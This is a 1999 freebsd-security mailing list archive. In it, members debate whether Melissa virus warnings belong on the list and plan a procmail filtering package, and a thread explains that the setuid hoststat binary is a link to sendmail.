> >> > >> >PS. I agree that this list should contain only FreeBSD-related >> >(or potentially related) issues. >> >Other issues are important, but there are other lists for them - >> >e.g. BUGTRAQ .. >> > >> >> OK, here's something FreeBSD-specific we ought to do. Let's make >> >> up a FreeBSD package that installs John Hardin's e-mail sanitizing >> >> filters with some sane default settings that kill the Melissa virus. >> >> >> >> John's filters can be found at >> >> >> >> ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-kit.html >> >> >> >> All we need to do is tweak the paths for FreeBSD, bring in >> >> procmail as a dependency, and tell the user how to configure >> >> Sendmail to use procmail as the local delivery agent. >> >> >> >> This would be something that could be touted as an advantage of >> >> using FreeBSD as a mail server. >> >> >> >> Of course, I'll probably be told that this is a bad idea because >> >> Jordan didn't think of it. >> >> >> >> --Brett Glass >> >> >> >> >> >> At 01:47 PM 3/29/99 -0800, patl@phoenix.volant.org wrote: >> >> >> And mind you, the two of you may sit in your own private heavens, >> >> >> but many of the rest of us work in the real world. This particular >> >> >> outbreak seems to warrant the original email. >> >> > >> >> >If by 'the real world' you mean an environment where you need to >> >> >worry about virii that infect Windows, M$ Word documents, Excell >> >> >spreadsheets, etc.; then you should be subscribed to one or more >> >> >lists dedicated to those topics. Let's keep this list FreeBSD >> >> >specific, please. >> >> > >> >> > >> >> > >> >> >-Pat >> >> > >> >> > >> >> >To Unsubscribe: send mail to majordomo@FreeBSD.org >> >> >with "unsubscribe freebsd-security" in the body of the message >> >> >> >> >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> >> with "unsubscribe freebsd-security" in the body of the message >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message > >-- >Laurence Berland, Stuyvesant HS Debate ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> >Windows 98: n. > useless extension to a minor patch release for > 32-bit extensions and a graphical shell for a > 16-bit patch to an 8-bit operating system > originally coded for a 4-bit microprocessor, > written by a 2-bit company that can't stand for > 1 bit of competition. >http://stuy.debate.net >icq #7434346 aol imer E1101 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 21:54:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 11CFB158F1 for ; Mon, 29 Mar 1999 21:54:18 -0800 (PST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id HAA07988; Tue, 30 Mar 1999 07:53:58 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id HAA22580; Tue, 30 Mar 1999 07:53:53 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: patl@phoenix.volant.org Cc: "Theo Purmer (Tepucom)" , "'freebsd-security@FreeBSD.ORG'" Subject: Re: Virus Announcements In-reply-to: Your message of "Mon, 29 Mar 1999 13:47:41 -0800." Date: Tue, 30 Mar 1999 07:53:52 +0200 Message-ID: <22578.922773232@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , patl@phoenix.volant.org writes: >> And mind you, the two of you may sit in your own private heavens, >> but many of the rest of us work in the real world. This particular >> outbreak seems to warrant the original email. > >If by 'the real world' you mean an environment where you need to >worry about virii that infect Windows, M$ Word documents, Excell >spreadsheets, etc.; then you should be subscribed to one or more >lists dedicated to those topics. Let's keep this list FreeBSD >specific, please. By 'the real world' I mean the one where people are not fanatic minimalists, and where the exception to the rule is recognized as what defines the shape of the rule. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 22: 4:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 7D1A11594E for ; Mon, 29 Mar 1999 22:04:23 -0800 (PST) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id XAA06389; Mon, 29 Mar 1999 23:00:38 -0700 (MST) Message-Id: <4.2.0.32.19990329225803.00a86c70@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Mon, 29 Mar 1999 22:59:00 -0700 To: Poul-Henning Kamp , patl@phoenix.volant.org From: Brett Glass Subject: Re: Virus Announcements Cc: "Theo Purmer (Tepucom)" , "'freebsd-security@FreeBSD.ORG'" In-Reply-To: <22578.922773232@critter.freebsd.dk> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 07:53 AM 3/30/99 +0200, Poul-Henning Kamp wrote: >By 'the real world' I mean the one where people are not fanatic >minimalists, and where the exception to the rule is recognized as >what defines the shape of the rule. In the real world, none of us can avoid having to deal with Windows. In many cases, it's the reason why our UNIX skills are so valuable. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 23: 2:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp2.andrew.cmu.edu (SMTP2.ANDREW.CMU.EDU [128.2.10.82]) by hub.freebsd.org (Postfix) with ESMTP id 15D1314D29 for ; Mon, 29 Mar 1999 23:02:45 -0800 (PST) (envelope-from Harry_M_Leitzell@cmu.edu) Received: from unix8.andrew.cmu.edu (UNIX8.ANDREW.CMU.EDU [128.2.15.12]) by smtp2.andrew.cmu.edu (8.8.5/8.8.2) with SMTP id CAA00561 for ; Tue, 30 Mar 1999 02:02:25 -0500 (EST) Date: Tue, 30 Mar 1999 02:02:24 -0500 (EST) From: "Harry M. Leitzell" X-Sender: Harry_M_Leitzell@unix8.andrew.cmu.edu To: freebsd-security@freebsd.org Subject: Curious about 'hoststat' Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well, I am going through a FreeBSD machine and removing the suid bits on programs that have no purpose having them for a simple user host machine. Going through /var/log/setuid.today and changing the permissions on the programs seems like a good idea until I got to 'hoststat'. -r-sr-xr-x 5 root wheel 290016 Feb 15 05:45:23 1999 /usr/bin/hoststat I usually go through the man pages for a program that has a suid bit by default to make sure no user actually could have a use for it. Only this doesn't have a man page. A keyword search turns up nothing. Running it does seemingly nothing. It intrigues me that a progam could be suid 0 by default and not have any documentation on it. While the experienced person might just CVS the source, deduce the meaning of it from the code, some of us don't have the experience or time to do so. I was just thinking if there isn't sufficient documentation on the program, should it be installed suid 0 by default? [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-] Harry M. Leitzell - Harry_M_Leitzell@cmu.edu Carnegie Mellon University Finger for PGP Public Key [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 23: 4: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id E881114D29 for ; Mon, 29 Mar 1999 23:03:46 -0800 (PST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id JAA08291; Tue, 30 Mar 1999 09:03:23 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id JAA22993; Tue, 30 Mar 1999 09:03:12 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Brett Glass Cc: patl@phoenix.volant.org, "Theo Purmer (Tepucom)" , "'freebsd-security@FreeBSD.ORG'" Subject: Re: Virus Announcements In-reply-to: Your message of "Mon, 29 Mar 1999 22:59:00 PDT." <4.2.0.32.19990329225803.00a86c70@localhost> Date: Tue, 30 Mar 1999 09:03:12 +0200 Message-ID: <22991.922777392@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.2.0.32.19990329225803.00a86c70@localhost>, Brett Glass writes: >At 07:53 AM 3/30/99 +0200, Poul-Henning Kamp wrote: > >>By 'the real world' I mean the one where people are not fanatic >>minimalists, and where the exception to the rule is recognized as >>what defines the shape of the rule. > >In the real world, none of us can avoid having to deal with Windows. >In many cases, it's the reason why our UNIX skills are so valuable. amen! -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 23:24:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell.futuresouth.com (shell.futuresouth.com [198.78.58.28]) by hub.freebsd.org (Postfix) with ESMTP id 45C9C14D29 for ; Mon, 29 Mar 1999 23:24:44 -0800 (PST) (envelope-from fullermd@futuresouth.com) Received: (from fullermd@localhost) by shell.futuresouth.com (8.9.3/8.9.3) id BAA10184; Tue, 30 Mar 1999 01:24:22 -0600 (CST) Date: Tue, 30 Mar 1999 01:24:22 -0600 From: "Matthew D. Fuller" To: "Harry M. Leitzell" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Curious about 'hoststat' Message-ID: <19990330012422.Z17547@futuresouth.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: ; from Harry M. Leitzell on Tue, Mar 30, 1999 at 02:02:24AM -0500 X-OS: FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Mar 30, 1999 at 02:02:24AM -0500, a little birdie told me that Harry M. Leitzell remarked > Well, I am going through a FreeBSD machine and removing the suid > bits on programs that have no purpose having them for a simple user host > machine. Going through /var/log/setuid.today and changing the permissions > on the programs seems like a good idea until I got to 'hoststat'. > > -r-sr-xr-x 5 root wheel 290016 Feb 15 05:45:23 1999 /usr/bin/hoststat I'm too asleep to look at CVS logs, but here's food for thought: 1) From strings-ing it, it looks like part of sendmail 2) [1:21:57] mortis:~ (ttyp5):{2417}% ktrace hoststat [1:22:13] mortis:~ (ttyp5):{2418}% page kdump < ktrace.out 19217 ktrace RET ktrace 0 19217 ktrace CALL readlink(0x200709a2,0xefbfd2c0,0x3f) 19217 ktrace NAMI "/etc/malloc.conf" 19217 ktrace RET readlink -1 errno 2 No such file or directory 19217 ktrace CALL mmap(0,0x1000,0x3,0x1002,0xffffffff,0,0,0) 19217 ktrace RET mmap 536985600/0x2001c000 19217 ktrace CALL break(0x5000) 19217 ktrace RET break 0 19217 ktrace CALL break(0x6000) 19217 ktrace RET break 0 19217 ktrace CALL execve(0xefbfd3c8,0xefbfd888,0xefbfd890) 19217 ktrace NAMI "/usr/local/bin/hoststat" 19217 ktrace RET execve -1 errno 2 No such file or directory 19217 ktrace CALL execve(0xefbfd3c8,0xefbfd888,0xefbfd890) 19217 ktrace NAMI "/usr/local/sbin/hoststat" 19217 ktrace RET execve -1 errno 2 No such file or directory 19217 ktrace CALL execve(0xefbfd3c8,0xefbfd888,0xefbfd890) 19217 ktrace NAMI "/usr/bin/hoststat" --- *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* | Matthew Fuller http://www.over-yonder.net/ | * fullermd@futuresouth.com fullermd@over-yonder.net * | UNIX Systems Administrator Specializing in FreeBSD | * FutureSouth Communications ISPHelp ISP Consulting * | "The only reason I'm burning my candle at both ends, | * is because I haven't figured out how to light the * | middle yet" | *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 29 23:46: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from GndRsh.aac.dev.com (GndRsh.aac.dev.com [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 95D68153D6 for ; Mon, 29 Mar 1999 23:45:50 -0800 (PST) (envelope-from rgrimes@GndRsh.aac.dev.com) Received: (from rgrimes@localhost) by GndRsh.aac.dev.com (8.8.8/8.8.8) id XAA11308; Mon, 29 Mar 1999 23:45:17 -0800 (PST) (envelope-from rgrimes) From: "Rodney W. Grimes" Message-Id: <199903300745.XAA11308@GndRsh.aac.dev.com> Subject: Re: Curious about 'hoststat' In-Reply-To: from "Harry M. Leitzell" at "Mar 30, 99 02:02:24 am" To: Harry_M_Leitzell@cmu.edu (Harry M. Leitzell) Date: Mon, 29 Mar 1999 23:45:17 -0800 (PST) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Well, I am going through a FreeBSD machine and removing the suid > bits on programs that have no purpose having them for a simple user host > machine. Going through /var/log/setuid.today and changing the permissions > on the programs seems like a good idea until I got to 'hoststat'. > > -r-sr-xr-x 5 root wheel 290016 Feb 15 05:45:23 1999 /usr/bin/hoststat > > I usually go through the man pages for a program that has a suid > bit by default to make sure no user actually could have a use for it. > Only this doesn't have a man page. A keyword search turns up nothing. > Running it does seemingly nothing. It intrigues me that a progam could be > suid 0 by default and not have any documentation on it. While the > experienced person might just CVS the source, deduce the meaning of it > from the code, some of us don't have the experience or time to do so. I > was just thinking if there isn't sufficient documentation on the program, > should it be installed suid 0 by default? It should have a man page.. but it is documented in /usr/share/doc/smm/08.sendmailop/. Which says this about it: 1.3.4. /usr/bin/hoststat The hoststat command should just be a link to sendmail, in a fashion similar to newaliases. This command lists the status of the last mail transac- tion with all remote hosts. It functions only when the HostStatusDirectory option is set. It is a hardlink to /usr/sbin/sendmail, and thus is why it has suid on it... -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.aac.dev.com Accurate Automation, Inc. Reliable computers for FreeBSD http://www.aai.dnsmgr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 30 0:23:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.seidata.com (ns1.seidata.com [208.10.211.2]) by hub.freebsd.org (Postfix) with ESMTP id 0716314D1A for ; Tue, 30 Mar 1999 00:23:10 -0800 (PST) (envelope-from mike@seidata.com) Received: from localhost (mike@localhost) by ns1.seidata.com (8.8.8/8.8.5) with ESMTP id DAA17756; Tue, 30 Mar 1999 03:22:49 -0500 (EST) Date: Tue, 30 Mar 1999 03:22:49 -0500 (EST) From: To: "Matthew D. Fuller" Cc: "Harry M. Leitzell" , freebsd-security@FreeBSD.ORG Subject: Re: Curious about 'hoststat' In-Reply-To: <19990330012422.Z17547@futuresouth.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 30 Mar 1999, Matthew D. Fuller wrote: > > -r-sr-xr-x 5 root wheel 290016 Feb 15 05:45:23 1999 /usr/bin/hoststat > 1) From strings-ing it, it looks like part of sendmail FWIW, ls -l /usr/bin/hoststat shows that it is a link to sendmail under my 3.0-REL boxes. Later, -Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 30 0:33:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 12EA314D93 for ; Tue, 30 Mar 1999 00:33:37 -0800 (PST) (envelope-from jkh@zippy.cdrom.com) Received: from zippy.cdrom.com (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id AAA43894; Tue, 30 Mar 1999 00:32:53 -0800 (PST) (envelope-from jkh@zippy.cdrom.com) To: "Harry M. Leitzell" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Curious about 'hoststat' In-reply-to: Your message of "Tue, 30 Mar 1999 02:02:24 EST." Date: Tue, 30 Mar 1999 00:32:53 -0800 Message-ID: <43892.922782773@zippy.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Well, I am going through a FreeBSD machine and removing the suid > bits on programs that have no purpose having them for a simple user host > machine. Going through /var/log/setuid.today and changing the permissions > on the programs seems like a good idea until I got to 'hoststat'. Look at the inode number - it's the same file as /usr/sbin/sendmail. It's just there as a convenient hook. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 30 2:24:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from k6n1.znh.org (unknown [207.109.235.52]) by hub.freebsd.org (Postfix) with ESMTP id EBA7815A8C for ; Tue, 30 Mar 1999 02:23:50 -0800 (PST) (envelope-from zach@uffdaonline.net) Received: (from zach@localhost) by k6n1.znh.org (8.9.3/8.9.1) id KAA09168; Tue, 30 Mar 1999 10:20:05 GMT (envelope-from zach) Message-ID: <19990330042005.A9075@znh.org> Date: Tue, 30 Mar 1999 04:20:05 -0600 From: Zach Heilig To: Brett Glass , Laurence Berland , security@freebsd.org Subject: Re: Virus Announcements References: <4.2.0.32.19990329155900.00a557c0@localhost> <4.2.0.32.19990329164244.04553770@localhost> <37001F1B.C2B92D74@confusion.net> <4.2.0.32.19990329175542.00c88430@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <4.2.0.32.19990329175542.00c88430@localhost>; from Brett Glass on Mon, Mar 29, 1999 at 06:09:45PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Mar 29, 1999 at 06:09:45PM -0700, Brett Glass wrote: > In the meantime, who here knows the arcana of how to build a package? > I've looked at the innards of a couple of tarballs but have no idea > how to specify dependencies, pop up a message to tell the user what to > do next, test for the right version of Perl (you need Perl5 and some > FreeBSD users have Perl4), etc. There don't seem to be any docs. You did look in the top part of /usr/ports/Mk/bsd.port.mk , right? It does a fair job of documenting what needs to be done for a port. -- Zach Heilig To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 30 2:26:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from aniwa.sky (p18-max12.wlg.ihug.co.nz [216.100.145.18]) by hub.freebsd.org (Postfix) with ESMTP id B4D3615A24 for ; Tue, 30 Mar 1999 02:26:26 -0800 (PST) (envelope-from andrew@squiz.co.nz) Received: from aniwa.sky (localhost [127.0.0.1]) by aniwa.sky (8.9.1a/8.9.1) with ESMTP id VAA01035; Tue, 30 Mar 1999 21:38:01 +1200 (NZST) Message-Id: <199903300938.VAA01035@aniwa.sky> X-Mailer: exmh version 2.0.2 2/24/98 To: Brett Glass Cc: Laurence Berland , security@FreeBSD.ORG Subject: Re: Virus Announcements In-reply-to: Your message of "Mon, 29 Mar 1999 18:09:45 MST." <4.2.0.32.19990329175542.00c88430@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 30 Mar 1999 21:38:01 +1200 From: Andrew McNaughton Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > In the meantime, who here knows the arcana of how to build a package? I've looked > at the innards of a couple of tarballs but have no idea how to specify dependencies, > pop up a message to tell the user what to do next, test for the right version of > Perl (you need Perl5 and some FreeBSD users have Perl4), etc. There don't seem > to be any docs. Well, I'm no expert, but I've built my first few ports recently. The documentation is in the handbook. In my somewhat outdated copy of the handbook it's at "17.2.5. Porting an existing piece of free software" making a package amounts to the same thing as making a port. You just do a "make package" from the port's directory. Dependencies are specified in the Makefile. I don't know how they are specified in the package, but I don't think it's somethin one needs to know in order to build a package. Andrew -- ----------- Andrew McNaughton andrew@squiz.co.nz http://www.newsroom.co.nz/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 30 4:48: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id D98521547C for ; Tue, 30 Mar 1999 04:47:55 -0800 (PST) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id JAA14655 for freebsd-security@freebsd.org; Tue, 30 Mar 1999 09:47:06 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199903301247.JAA14655@ns1.sminter.com.ar> Subject: Anti-spamming filter files To: freebsd-security@freebsd.org Date: Tue, 30 Mar 1999 09:47:05 -0300 (GMT) X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The anti-spamming filters that come with FreeBSD in /etc/mail require certain files from ftp.gulf.net. The folks there have closed anonymous FTP for some security issue they had. Anyone knows an alternative place to download these files? Thanks! Fernando P. Schapachnik Administracion de la red VIA Net Works Argentina SA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 30 5:20:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 4BD611536A for ; Tue, 30 Mar 1999 05:20:37 -0800 (PST) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id GAA08250; Tue, 30 Mar 1999 06:20:12 -0700 (MST) Message-Id: <4.2.0.32.19990330061206.00c3e510@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Tue, 30 Mar 1999 06:20:05 -0700 To: Zach Heilig , Laurence Berland , security@freebsd.org From: Brett Glass Subject: Re: Virus Announcements In-Reply-To: <19990330042005.A9075@znh.org> References: <4.2.0.32.19990329175542.00c88430@localhost> <4.2.0.32.19990329155900.00a557c0@localhost> <4.2.0.32.19990329164244.04553770@localhost> <37001F1B.C2B92D74@confusion.net> <4.2.0.32.19990329175542.00c88430@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I haven't installed that port. I've been told, however, that the pkg_create documentation has some information. (Not everything I'd need, and I'm worried about trashing any system on which I test a port, but enough to get started.) Again, there are subtle dependencies. You need to be able to rebuild your sendmail.cf with the m4 macro processor -- something that's not trivial to do. The user would have to do this to make procmail the local delivery agent, and we probably cannot automate it. Also, Perl is apparently in different places on different FreeBSD systems. Some have it in /usr/bin, others in /usr/local/bin. And the version of procmail in the ports differs with the version of FreeBSD you have. (The latest procmail was released only this month.) So, you can get the user started by installing all that's needed, but must then tell him or her how to do the rest by hand so as not to disrupt mail. Finally, it isn't clear whether one can automatically pull in the latest filters right from the repository on John's FTP site as part of the port. Probably possible, but not clear from the docs. --Brett At 04:20 AM 3/30/99 -0600, Zach Heilig wrote: >On Mon, Mar 29, 1999 at 06:09:45PM -0700, Brett Glass wrote: >> In the meantime, who here knows the arcana of how to build a package? >> I've looked at the innards of a couple of tarballs but have no idea >> how to specify dependencies, pop up a message to tell the user what to >> do next, test for the right version of Perl (you need Perl5 and some >> FreeBSD users have Perl4), etc. There don't seem to be any docs. > >You did look in the top part of /usr/ports/Mk/bsd.port.mk , right? It >does a fair job of documenting what needs to be done for a port. > >-- >Zach Heilig To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 30 7:23:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 251ED159DE for ; Tue, 30 Mar 1999 07:23:38 -0800 (PST) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id KAA17222; Tue, 30 Mar 1999 10:23:14 -0500 (EST) (envelope-from wollman) Date: Tue, 30 Mar 1999 10:23:14 -0500 (EST) From: Garrett Wollman Message-Id: <199903301523.KAA17222@khavrinen.lcs.mit.edu> To: "Matthew D. Fuller" Cc: "Harry M. Leitzell" , freebsd-security@FreeBSD.ORG Subject: Re: Curious about 'hoststat' In-Reply-To: <19990330012422.Z17547@futuresouth.com> References: <19990330012422.Z17547@futuresouth.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > 1) From strings-ing it, it looks like part of sendmail As others have pointed out, it is a hard link to sendmail. It doesn't do anything unless you are using the `persistent host status' feature, in which case it tells you what the status is/was: -------------- Hostname --------------- How long ago ---------Results--------- uu2.pn.com 3+13:58:30 250 TAA26192 Message acce smtp1.pn.com 296+10:13:00 250 BAA11595 Message acce world.std.com 3+19:47:51 Deferred: Operation timed world-f.std.com 01:21:42 250 Ok pimaia3w.prodigy.com 405+21:25:26 Deferred: Connection refu [1652 additional lines deleted] -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 30 8: 0:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from aniwa.sky (p32-max12.wlg.ihug.co.nz [216.100.145.32]) by hub.freebsd.org (Postfix) with ESMTP id 78BA714CC6 for ; Tue, 30 Mar 1999 08:00:47 -0800 (PST) (envelope-from andrew@squiz.co.nz) Received: from aniwa.sky (localhost [127.0.0.1]) by aniwa.sky (8.9.1a/8.9.1) with ESMTP id EAA04595; Wed, 31 Mar 1999 04:00:00 +1200 (NZST) Message-Id: <199903301600.EAA04595@aniwa.sky> X-Mailer: exmh version 2.0.2 2/24/98 To: Garrett Wollman Cc: "Matthew D. Fuller" , "Harry M. Leitzell" , freebsd-security@FreeBSD.ORG Subject: Re: Curious about 'hoststat' In-reply-to: Your message of "Tue, 30 Mar 1999 10:23:14 EST." <199903301523.KAA17222@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 31 Mar 1999 04:00:00 +1200 From: Andrew McNaughton Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > < said: > > > 1) From strings-ing it, it looks like part of sendmail > > As others have pointed out, it is a hard link to sendmail. It doesn't It's a symlink on my system. At least one other post indicated the same. I presume this is dependant on the vintage of your sendmail setup. I've upgraded my system from an original install of 8.8.7 to sendmail 8.9.1. Is the symlink a more recent arrangement than the hard link, or is this something to do with the upgrade not changing it? (perhaps writing through the symlink) Andrew -- ----------- Andrew McNaughton andrew@squiz.co.nz http://www.newsroom.co.nz/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 31 8:17:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 634F715520 for ; Wed, 31 Mar 1999 08:17:51 -0800 (PST) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id IAA14098; Wed, 31 Mar 1999 08:17:09 -0800 (PST) Message-ID: <19990331081709.B11641@best.com> Date: Wed, 31 Mar 1999 08:17:09 -0800 From: "Jan B. Koum " To: "Jordan K. Hubbard" , "Harry M. Leitzell" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Curious about 'hoststat' References: <43892.922782773@zippy.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <43892.922782773@zippy.cdrom.com>; from Jordan K. Hubbard on Tue, Mar 30, 1999 at 12:32:53AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Mar 30, 1999 at 12:32:53AM -0800, "Jordan K. Hubbard" wrote: > > Well, I am going through a FreeBSD machine and removing the suid > > bits on programs that have no purpose having them for a simple user host > > machine. 